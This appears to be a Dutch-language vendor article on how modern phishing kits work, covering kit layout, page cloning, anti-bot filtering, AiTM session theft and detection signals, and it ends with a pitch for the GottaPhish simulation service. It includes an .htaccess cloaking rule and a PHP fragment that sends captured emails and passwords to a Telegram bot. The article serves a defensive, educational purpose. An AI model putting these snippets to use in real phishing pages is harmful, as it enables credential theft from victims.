Anatomie van een moderne phishingkit
Een «phishingkit» is de verpakte, herbruikbare codebasis die aanvallers uitrollen om een inlogpagina te klonen, inloggegevens te oogsten en te exfiltreren. Begrijpen hoe deze kits zijn gebouwd — en hoe ze zich verbergen — maakt het veel makkelijker om campagnes vroeg te detecteren en overtuigende defensieve simulaties te bouwen.
Wat er in een kit zit
Een typische kit is een ZIP-archief dat op een gekaapte host of goedkope hosting wordt gezet. De structuur is opvallend constant:
kit/
├── index.php # de gekloonde landingspagina
├── login.php # formulierverwerker: vangt + stuurt inloggegevens door
├── assets/ # pixelgetrouwe kopieën van CSS, JS, logo's, lettertypen
├── config.php # exfiltratiedoel (e-mail, Telegram-bot, externe URL)
├── antibots.php # bloklijsten voor crawlers, sandboxes, onderzoekers
└── .htaccess # rewrites, geo-/IP-filtering, hotlinkbescherming
Moderne kits worden steeds vaker «als dienst» verkocht (PhaaS — Phishing-as-a-Service), compleet met abonnementsdashboards, updates en support.
De kloon
De landingspagina is meestal een byte-voor-byte kopie van een echt inlogscherm, vastgelegd met een site-ripper of een headless browser. Twee kenmerken komen vaak voor:
- Absolute asset-URL's die nog naar het legitieme CDN wijzen (zo laadt de pagina echte logo's terwijl het formulier naar de aanvaller post).
- Een
<form>waarvan deactionnaar een lokale PHP-verwerker wijst in plaats van naar het echte endpoint van het merk.
Geavanceerde kits proxyen de echte site in realtime (een adversary-in-the-middle-opzet met tools als Evilginx), leiden de invoer van het slachtoffer door naar de echte server en stelen de resulterende sessiecookie — wat de meeste MFA verslaat.
Anti-analyselaag
Het antibots-onderdeel houdt een kit in leven. Het filtert bezoekers voordat de phishingpagina wordt geserveerd:
- User-agent- en ASN-filtering — blokkeert bekende crawlers en de IP-reeksen van Google, Microsoft, securityleveranciers en cloudsandboxes.
- Referer- en geo-controles — serveert de pagina alleen aan doelwitten uit het verwachte land en stuurt de rest door naar de echte site.
- Rate limiting en eenmalige links — een token in de URL dat na één bezoek opbrandt, zodat een doorgestuurd exemplaar een onschuldige 404 toont.
# .htaccess-fragment
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]
Daarom was een URL die voor een SOC-analist «dood lijkt», minuten eerder volledig live voor het slachtoffer.
Inloggegevens vangen en exfiltreren
De verwerker valideert net genoeg om echt te lijken en verstuurt dan de data. Exfiltratiekanalen, grofweg op populariteit:
- SMTP / mail() naar een vast ingebouwde mailbox.
- Telegram Bot-API — een
sendMessage-aanroep naar een bot-token, goedkoop en veerkrachtig. - POST naar een C2-URL of een Discord-webhook.
- Lokaal logbestand dat de operator later leegtrekt.
$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");
Let op de laatste redirect: na het «mislukte inloggen» belandt het slachtoffer op de echte site, denkt aan een typfout, logt succesvol in en vermoedt niets.
Hosting en aflevering
Kits geven de voorkeur aan wegwerpinfrastructuur: gekaapte WordPress-sites, open redirects op vertrouwde domeinen, net geregistreerde gelijkende domeinen en steeds vaker legitieme diensten (Cloudflare Workers, IPFS, SharePoint, Google Docs) om hun reputatie te lenen. De aflevering koppelt de kit aan lokaas — een factuur, een MFA-«herverificatie», een melding van een gedeeld document.
Defensieve detectie
Signalen die het jagen waard zijn:
- Net geregistreerde domeinen die op uw merk lijken (monitor CT-logs en typosquats).
- Favicon- en DOM-hashing — kits hergebruiken de exacte assets van het gekloonde merk.
- Uitgaande Telegram- / webhook-aanroepen vanaf webhosts die daar niets te zoeken hebben.
- Inzending van inloggegevens naar onverwachte origins in browsertelemetrie.
- DMARC-aggregatierapporten die spoofingpogingen tegen uw domein onthullen.
De ongemakkelijke waarheid: een goed gebouwde AiTM-kit verslaat MFA via sms en app door het sessietoken te stelen. Phishingbestendige methoden — FIDO2 / passkeys — zijn de duurzame oplossing.
Hoe GottaPhish helpt
Moderne phishingkits maken wapens van pixelgetrouwe klonen en AiTM-sessiediefstal die zelfs MFA via sms en app verslaan. GottaPhish en zijn expertteam helpen u precies die dreiging te weerstaan: veilige, volledig gecontroleerde simulaties die echte kits weerspiegelen — getokeniseerde links, credential-capture-flows, AiTM-scenario's — met dashboards die tonen welk lokaas aanslaat en waar MFA standhoudt. Onze experts begeleiden de inrichting, ontwerpen scenario's die het huidige PhaaS-vakmanschap nabootsen en helpen de resultaten te duiden als gerichte training en als concrete detection-engineering-signalen voor uw SOC.
